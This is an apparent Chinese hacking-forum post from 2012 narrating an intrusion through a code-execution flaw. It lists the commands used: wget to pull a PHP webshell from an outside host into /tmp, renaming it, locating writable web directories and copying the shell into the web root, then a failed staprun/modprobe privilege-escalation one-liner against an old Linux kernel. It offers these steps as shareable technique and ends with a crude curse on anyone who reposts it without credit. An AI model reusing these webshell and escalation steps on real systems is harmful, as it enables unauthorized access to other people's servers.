记一次Code execution渗透

2012-12-04 04:16:04 21 5233


前言:每天起床开电脑,第一件事就是习惯性的访问t00ls,真是墙倒众人推啊。人性不管在生活,还是互联网都是一样。本文没什么技术含量。真心+真心,只希望t00ls好起来,加点人气。那些势力狗,也会早点回来。转载请注明t00ls,不然你死全家

把当时渗透的思路和过程写完,申请个精华应该是可以的。忽略各种没必要写的,直捣黄龙。重在分享,不在乎别的了。弯路我走了,以后大家遇到就不用走了

0x01
id

nobody,干不了什么。先搞个webshell吧

0x02
wget -p /tmp http://www.test.com/1.txt                        //php脚本,肯定是不能直接下载的。只能等下mv重命名


mv /tmp/1.txt /tmp/1.php                    //当前路径不是tmp目录,所以要加路径。一次只能执行一个命令,再执行另外一个命令的话,等于刷新网页了。所以不能cd到tmp

0x03
上传图片目录,都是可写的。一般把后门cp到图片目录下就行了。
但是大网站,有单独的图片服务器。分离开来了,所以是不行的。
只有找web下可写的目录
ls -la /home/web/


0x04
cp /tmp/1.php /home/web/1.php


小菜写了几个小时,到最后被我缩短再缩短。只留下了这个漏洞总结的东西。

2.6.18-164.15.1.el5  2010 64位 的提权,大家有成功过的分享出来一下。

GNU C library dynamic linker $ORIGIN expansion Vulnerability        //nobody 肯定是不行的
printf "install uprobes /bin/sh" > exploit.conf; MODPROBE_OPTIONS="-C exploit.conf" staprun -u whatever          //失败

关于作者

妖妖灵103篇文章1771篇回复

评论21次

要评论?请先  登录  或  注册